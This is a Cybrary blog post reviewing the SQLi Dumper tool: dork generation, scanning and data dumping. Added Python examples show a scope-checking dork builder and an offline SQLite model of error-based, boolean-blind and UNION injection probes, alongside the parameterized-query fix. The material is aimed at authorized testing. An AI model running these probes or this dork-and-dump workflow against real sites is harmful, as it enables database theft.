Pentesting with the SQLi Dumper v8 Tool | Cybrary (2024)


January 21, 2020


Darcy Kempa


Individuals interested in performing penetration testing against web applications backed by Structured Query Language (SQL) databases should look at SQLi Dumper. It is an automated SQL injection tool: it uses search-engine queries (dorks) to collect candidate URLs and then tests each one for SQL injection vulnerabilities. It can be downloaded through the https://sqli-dumper.com website. Download and use it with caution, and verify the binary before running it. The website also provides SQLi Dumper tutorials and other pertinent information.

This overview aims to support legal and authorized activities undertaken to improve the security of SQL databases. It does not promote SQLi Dumper as a "hacking" tool or to be used in illegal or unauthorized activities.

Background

As SQL became the dominant choice for database design and management, it also became a favorite target for attackers. A central repository (database) holding personally identifiable information (PII), credit card data, and other sensitive records is a tempting target. A business can use SQLi Dumper as part of its cybersecurity program to find injectable parameters in its own applications before an attacker does. The tool itself does not prevent SQL injection: each finding has to be fixed in the application code, typically by validating the input and binding it as a query parameter instead of concatenating it into the SQL text.

SQLi Dumper

This tool uses a 6-phase process to provide the requested information. Each phase, in turn, has several steps, and all are easy to understand.

  • Phase 1. Collect dorks.
  • Phase 2. Use a Proxy or VPN.
  • Phase 3. Insert dorks and start the scanner.
  • Phase 4. Click SQL Injection and start the exploiter.
  • Phase 5. Select URLs for searching.
  • Phase 6. Dump and save the data.

Dorks

Dorks are search criteria selected by the user. There are three categories located within the SQLi Dumper Dork Generator. The user can select dorks from Names/Keywords, Page Format, and Page Type.

The Names/Keywords category focuses on the names of pages and/or keywords to search. The name of a page can be seen in the browser address bar. Examples of this are "home" and "new products." On the other hand, keywords refer to the specific content within a page like "jacket" or "social security number."
Page Format refers to the scripting language used to create the web page, expressed as the page's file extension. Examples are ".asp", ".html", and ".php", as well as ".jsf" and ".raw". This category helps refine the type of page for the search.

Page Type is used to provide specific query information based on a value category. Entries in this category can be used to identify a specific product (IDProduct=), a cart item (cartID=), or other assigned values and/or categories located within a database.

After the dorks are specified, they are then saved to a file for further use.
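Phase 1 as an added worked example (not SQLi Dumper's own code, and not its dork-file format, which is assumed here to be one dork per line): it builds dorks by combining the three categories the way the generator does, writes them to a file, and checks a dorks file for entries that would send the scanner outside the authorized scope. The category values and the domain shop.example are constructed; the site: term is a standard search-engine operator added here for scoping.

```python
"""Dork generation and scope checking for Phase 1 (collect dorks).

Added example; not SQLi Dumper's code. The three category lists are
constructed to mirror the Dork Generator's Names/Keywords, Page Format and
Page Type categories, and the dorks file is assumed to hold one dork per line.
"""
from itertools import product

# Constructed sample values, one list per Dork Generator category.
NAMES_KEYWORDS = ["products", "cart"]       # Names/Keywords: page names to look for
PAGE_FORMATS = [".php", ".asp"]             # Page Format: file extension of the page
PAGE_TYPES = ["IDProduct=", "cartID="]      # Page Type: query parameter on the page


def generate_dorks(names, formats, page_types, scope_domains):
    """One inurl: dork per combination of the three categories, each pinned
    with site: to a domain the engagement is authorized to test."""
    return [
        f'site:{domain} inurl:"{name}{fmt}?{ptype}"'
        for domain, name, fmt, ptype in product(scope_domains, names, formats, page_types)
    ]


def _host_in_scope(host, scope_domains):
    """True when host is an authorized domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in scope_domains)


def out_of_scope(dorks, scope_domains):
    """Return the dorks that would let the scanner leave the authorized scope:
    no site: term at all, or a site: term that is not under scope_domains.
    Run it over a dorks file before loading the file into the scanner."""
    scope_domains = [d.lower() for d in scope_domains]
    flagged = []
    for dork in dorks:
        sites = [tok[5:] for tok in dork.split() if tok.lower().startswith("site:")]
        if not sites or not all(_host_in_scope(s, scope_domains) for s in sites):
            flagged.append(dork)
    return flagged


def save_dorks(path, dorks):
    """Write the dorks one per line (assumed dorks-file layout)."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(dorks) + "\n")


def load_dorks(path):
    """Read a dorks file back, dropping blank lines and # comments."""
    with open(path, encoding="utf-8") as fh:
        return [line.strip() for line in fh if line.strip() and not line.lstrip().startswith("#")]


if __name__ == "__main__":
    scope = ["shop.example"]
    dorks = generate_dorks(NAMES_KEYWORDS, PAGE_FORMATS, PAGE_TYPES, scope)
    save_dorks("dorks.txt", dorks)
    # A hand-added dork without site: would pull in arbitrary third-party hosts.
    mixed = load_dorks("dorks.txt") + ['inurl:"cart.php?cartID="']
    print(len(dorks), "dorks written; out of scope:", out_of_scope(mixed, scope))
```

Two names, two formats and two page types for one domain give eight dorks; the scope check is the step worth keeping even when the dorks are written by hand, since a single dork without a site: term turns an authorized test into a scan of whatever the search engine happens to return.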

Scanning

The rest of the steps are easy to understand and follow. The dorks file is loaded into the SQLi Dumper dorks text box. The user then selects one or more search engines to gather results from. Because the scanner will probe every URL the search engines return, an authorized test must constrain the dorks to in-scope hosts (for example with the site: operator) so that third-party sites are never touched. The next step is to click the Start Scanner button. After that, the user selects the SQL Injection option and clicks the Start Exploiter button. At this point, the user just waits for the results.

In the event of any confusion, there are pictures and diagrams available on the website. There are several tutorials available on YouTube.

Results

The scan results are viewed in one of five category tabs: URL's Queue, Exploitables, Injectables, Non-Injectables, and Trash Collector. The Injectables tab is of particular interest because the information presented includes the URL and the Method, and may also include the SQL Version and User. The Method is the injection technique that succeeded against the URL (for example error-based or union-based injection). The User is the database account the application connects as; MySQL reports it as user@host, which can look like an email address. Both are valuable for further exploitation attempts and for the remediation report, since a high-privilege database user turns one injectable parameter into access to the whole database.

The results are displayed in rows and columns. The user can click on the specific row, bringing up a pop-up window with more information. This allows the user to select specific URLs for further searching or for saving the scan results.
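To make concrete what the exploiter is doing when it fills the Method and SQL Version columns, and what the application-side fix mentioned under Background looks like, here is an added example (not SQLi Dumper's code and not Cybrary's). It models three versions of a constructed product page (the shop.example URL and the IDProduct parameter are assumed): one that concatenates the parameter into SQL and shows database errors, one that concatenates but hides errors, and one that binds the parameter. The probe classifies each the way the Injectables and Non-Injectables tabs would and, for the injectable ones, reads the database version with a UNION query. It runs against an in-memory SQLite database rather than over HTTP.

```python
"""Offline model of what the exploiter does with a URL the scanner found:
probe the query-string parameter, classify the URL the way the Injectables
and Non-Injectables tabs do (with the Method that worked), and read the
database version for an injectable URL (the SQL Version column).

Added example; not SQLi Dumper's code. The three page handlers, the
shop.example URL and the IDProduct parameter are constructed; they are backed
by an in-memory SQLite database so everything runs offline. Real probes go
over HTTP and URL-encode the payloads.
"""
import sqlite3
from urllib.parse import parse_qs, urlsplit

SAMPLE_URL = "http://shop.example/products.php?IDProduct=1"  # constructed

_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE products(id INTEGER, name TEXT);
    INSERT INTO products VALUES (1, 'jacket'), (2, 'boots');
""")


def _param(url, name="IDProduct"):
    """Value of one query-string parameter, '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def _unsafe_rows(url):
    """The injectable query: the parameter is concatenated into the SQL text,
    so anything after the number runs as SQL. May raise sqlite3.Error."""
    return _db.execute(f"SELECT name FROM products WHERE id = {_param(url)}").fetchall()


def vulnerable_app(url):
    """Injectable page that also shows database errors to the client."""
    try:
        rows = _unsafe_rows(url)
    except sqlite3.Error as exc:
        return f"500 database error: {exc}"
    return "200 " + ",".join(r[0] for r in rows)


def blind_app(url):
    """Injectable page that swallows errors; only a true/false difference in
    the page content gives the injection away."""
    try:
        rows = _unsafe_rows(url)
    except sqlite3.Error:
        rows = []
    return "200 " + ",".join(r[0] for r in rows)


def hardened_app(url):
    """The fix: validate the value and bind it as a parameter, so user input
    can never change the structure of the query."""
    pid = _param(url)
    if not pid.isdigit():
        return "400 bad id"
    rows = _db.execute("SELECT name FROM products WHERE id = ?", (int(pid),)).fetchall()
    return "200 " + ",".join(r[0] for r in rows)


def probe(fetch, url):
    """Classify one URL. fetch(url) -> response text stands in for an HTTP GET.
    A lone quote that triggers a server error means error-based injection;
    else a true/false condition pair that changes the page means boolean blind."""
    base = fetch(url)
    if fetch(url + "'").startswith("500"):
        return {"url": url, "injectable": True, "method": "error-based"}
    if fetch(url + " AND 1=1") == base and fetch(url + " AND 1=2") != base:
        return {"url": url, "injectable": True, "method": "boolean-blind"}
    return {"url": url, "injectable": False}


def fetch_version(fetch, url):
    """Union-based read of the database version (sqlite_version() here;
    @@version on MySQL). AND 1=0 empties the original result so the only row
    in the page is the injected one; None when the page is not injectable."""
    resp = fetch(url + " AND 1=0 UNION SELECT sqlite_version()")
    return resp[4:] if resp.startswith("200 ") and resp[4:] else None


if __name__ == "__main__":
    for app in (vulnerable_app, blind_app, hardened_app):
        result = probe(app, SAMPLE_URL)
        if result["injectable"]:
            result["sql_version"] = fetch_version(app, SAMPLE_URL)
        print(f"{app.__name__:15} {result}")
```

Running the block prints one row per handler: the first two come back injectable with different methods and the same SQL version, while the hardened handler answers every payload with a 400 or an unchanged page and is filed as non-injectable. That last row is the remediation check a tester should be able to reproduce after the development team ships the fix.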

Opinion

Overall, SQLi Dumper is a robust penetration testing tool. The variety of dorks available helps the pen-tester target specific pages and information. The ease of use and the straightforward design make SQLi Dumper a solid option for the novice and expert alike. Anyone involved in cybersecurity should take a look at this powerful tool.

Pertinent Training Options

Cybrary provides online training courses in information technology and cybersecurity. These courses cover a myriad of subjects, from project management to penetration testing to auditing. The following links are provided for your consideration.

  • Cybrary Home Page
  • Introduction to SQL
  • SQL Injection
